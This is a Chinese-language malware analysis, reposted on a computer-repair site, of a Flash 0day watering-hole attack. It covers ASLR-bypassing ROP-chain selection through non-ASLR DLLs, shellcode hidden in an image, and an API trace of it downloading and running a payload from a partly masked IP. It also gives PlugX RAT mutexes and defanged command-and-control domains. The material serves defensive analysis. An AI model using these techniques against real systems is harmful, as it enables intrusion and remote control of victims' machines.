沈阳电脑维修网,沈阳上门维修电脑服务
当前位置: 主页 > 沈阳网站推广>对利用Adobe 0day – CVE >

对利用Adobe 0day – CVE

时间:2017-5-23来源:www.sypcwx.cn 作者: 沈阳电脑维修网点击:
沈阳电脑维修,上门维修电脑
  沈阳电脑维修上门服务13889116605: 前些天FireEye发布了一个利用AdobeFlash的新0day进行攻击的报告,且Adobe已经根据漏洞情况发布了一个安全更新。根据FireEye的报告,许多网站会将访问者重定向到以下包含e... 前些天FireEye发布了一个利用AdobeFlash的新0day进行攻击的报告,且Adobe已经根据漏洞情况发布了一个安全更新。 根据FireEye的报告,许多网站会将访问者重定向到以下包含exploit的恶意服务器: PetersonInstituteforInternationalEconomics AmericanResearchCenterinEgypt SmithRichardsonFoundation恶意Flash文件位于http://4.59.XXX.XX/common/cc.swf 该Flash包含一些有趣的debugsymbols: C:\Users07\Desktop\FlashExp(ie)\src\cc.asFlash文件中的ActionScript代码用来确定操作系统版本以及选择硬编码的ROPchains来绕过ASLR。   如果是WindowsXP系统,代码会先检查系统语言,对于以下两种语言的系统,则只包含ROPchains: 英文 中文在这种情况下(WindowsXP系统),ROPchain使用一种众所周知的技术从msvcrt.dll中提取编译。     如果系统运行的是Windows7:  -检查系统是否安装了Java1.6或Java1.7。  -如果安装了Java1.6,代码使用Java1.6中自带的msvcr71.dll中的ROPchain,该dll文件没有ASLR保护。   -检查系统是否安装了MicrosoftOffice2007或2010  -如果安装了,则使用MicrosoftOffice2007/2010中自带的hxdl.dll中的ROPchain,该dll没有ASLR保护。 要加载hxds.dll,需要使用一种在这种类型的exploits中很常见的协议处理器location.href="/onload="resizeimg(this,575,600)">   下载的文件如下图所示,看起来是个正常的图片:     但该图片在位于偏移3344的地方包含一个shellcode,该shellcode会从同一服务器下载并执行一个PE32文件:     利用图片执行shellcode是一个聪明的做法,因为这样可以绕过很多网络安全产品的监控。 该shellcode通过利用以下函数来下载并执行PE32文件:     LoadLibraryA(wininet)   LoadLibraryA(user32)   VirtualProtect(adr=404bf1,sz=4,flags=40)   SetUnhandledExceptionFilter(0)   VirtualProtect(adr=7c81cdda,sz=82,flags=40)   VirtualProtect(adr=7c81cdda,sz=82,flags=0)   SetUnhandledExceptionFilter(7c81cdda)   GetTempPath(len=104,buf=12fca4)=14   GetTempFileName(path=C:\users\jaime\Temp\,prefix=0,unique=0,buf=12fca4)=245D    Path=C:\users\jaime\Temp\245d.tmp   InternetOpenA()   InternetOpenUrlA(http://4.59.XX.XX/common/update.exe)   CreateFileA(C:\users\jaime\Temp\245d.tmp)=4   InternetReadFile(1,buf:12fbe8,size:64)   InternetCloseHandle(1)=1   InternetCloseHandle(1)=1     CloseHandle(4)本次攻击中所用的payload是一个不怎么出名的远控程序PlugXRAT,我之前的博客中提到过它几次: TrackingdowntheauthorofthePlugXRAT  TheconnectionbetweenthePlugxChinesegangandthelatestInternetExplorerZeroday NewversionsoftheIExplorerZeroDayemergetargetingDefenceandIndustrialcompanies 恶意程序会将它自己拷贝到\AllUsers\DRM\RasTls\RasTls.exe,并在执行过程中创建以下互斥文件:   \BaseNamedObjects\Global\dklw \BaseNamedObjects\Global\cso \BaseNamedObjects\Global\qemyqvmyhiy \BaseNamedObjects\Global\eriwjjo \BaseNamedObjects\Global\etniisebehheq \BaseNamedObjects\Global\beetxado \BaseNamedObjects\Global\zhyzrjduosfptunf \BaseNamedObjects\Global\zzusnnzeqgzupeto \BaseNamedObjects\Global\onwmkwazrynpn \BaseNamedObjects\Global\nmtg \BaseNamedObjects\Global\helbibkzhruo \BaseNamedObjects\Global\opylrvflplgad \BaseNamedObjects\Global\zgjawrojchcfavnh \BaseNamedObjects\Global\gmd \BaseNamedObjects\Global\svdwr \BaseNamedObjects\Global\unbdehrrxgqujyazj \BaseNamedObjects\Global\qpl \BaseNamedObjects\Global\ihnwguwceofkhcv \BaseNamedObjects\Global\kvxieoc   \BaseNamedObjects\My_Name_horse(Svchost)同时将自身注入到svchost进程中。 PlugX包含三种不同的命令和控制方式: 00903474->java[.]ns1[.]name 009034B8->adservice[.[no-ip[.]org 009034FC->wmi[.]ns01[.]us并通过HTTP与C&C交互:     注意下图中指定的C&C域名是恶意构造的:   至此,不用我提醒你也会尽快更新Adobe和包含漏洞、可以被用来绕过ASLR的Java和Office版本了吧。 祝玩得愉快!  
上一篇:浅议SNMP安全、SNMP协议、网络管理学习
查看[对利用Adobe 0day – CVE]所有评论
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
用户名: 验证码:
推荐内容
关于我们 服务价格 联系我们 企业网站优化 沈阳网站建设 沈阳维修电脑